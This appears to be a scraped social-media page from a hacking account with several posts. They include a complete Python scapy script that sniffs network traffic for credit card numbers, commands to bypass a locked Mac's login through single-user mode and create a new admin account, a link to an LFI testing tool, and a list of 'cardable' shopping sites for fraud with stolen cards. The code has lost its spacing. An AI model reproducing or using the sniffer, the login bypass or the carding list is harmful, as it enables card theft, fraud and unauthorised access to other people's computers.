Hackry0DeBian
11/02/2022
Using python regular expression to sniff credit card
importre
importoptparse
fromscapy.allimport*
deffindCreditCard(pkt):
raw=pkt.sprintf('%Raw.load%')
americaRE=re.findall('3[47][0-9]{13}',raw)
masterRE=re.findall('5[1-5][0-9]{14}',raw)
visaRE=re.findall('4[0-9]{12}(?:[0-9]{3})?',raw)
ifamericaRE:
print'[+]FoundAmericanExpressCard:'+americaRE[0]
ifmasterRE:
print'[+]FoundMasterCardCard:'+masterRE[0]
ifvisaRE:
print'[+]FoundVisaCard:'+visaRE[0]
defmain():
parser=optparse.OptionParser('usage%prog-i')
parser.add_option('-i',dest='interface',type='string',\
help='specifyinterfacetolistenon')
(options,args)=parser.parse_args()
ifoptions.interface==None:
printparser.usage
exit(0)
else:
conf.iface=options.interface
try:
print'[*]StartingCreditCardSniffer.'
sniff(filter='tcp',prn=findCreditCard,store=0)
exceptKeyboardInterrupt:
exit(0)
if__name__=='__main__':
main()
🔰 How to access a locked Mac🔰
1) Shut down the computer
2) Start the computer and hold command + s
3) type the following code line by line
🌀 CODE :-
mount -uw /
rm /var/db/.applesetupdone
shutdown -h now
4) Restart the computer
5) Create a new admin account using the setup process that comes in front of you.
6) Wait for the setup to start
7) If you want, you can now change the password of all of the other accounts on the computer.
🟢 Share and Support SannSanni Abdul BasituSanni Abdul BasitiSanni Abdul BasitBDe BiannDe BianBDe BiannDe Bian
20/01/2022
LFITester:-- A Python3 program that automates the detection of Local File Inclusion (LFI) attacks in a server.
It runs in Linux/Unix systems but it can run on windows as well.
Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.
:-
https://github.com/kostas-pa/LFITester
Visit Us:- https://ncybersecurity.com
15/01/2022
🔰Cardable Websites 2021🔰
http://www.techbuy.com.au
http://www.buymac.com.au
Http://www.giftvouchers.com
http://www.landsend.com
http://www.riftgame.com
http://www.occhialissimi.it
http://www.cloncom.com
http://www.yesasia.com
âž– HaHackry0DeBian
Click here to claim your Sponsored Listing.
22/01/2022